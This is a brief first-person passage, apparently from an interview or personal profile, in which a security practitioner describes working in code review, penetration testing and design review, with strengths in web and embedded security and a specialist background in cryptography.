Now I do more general security, which includes code review, penetration testing, and architecture/design.  I have strong skills in web security and embedded security.  I like having this breadth of expertise, but I also have depth of expertise in cryptography, which distinguishes me from most people who do similar work.  The cryptography background is definitely a benefit.  But I am sure glad that I do a lot more than just that.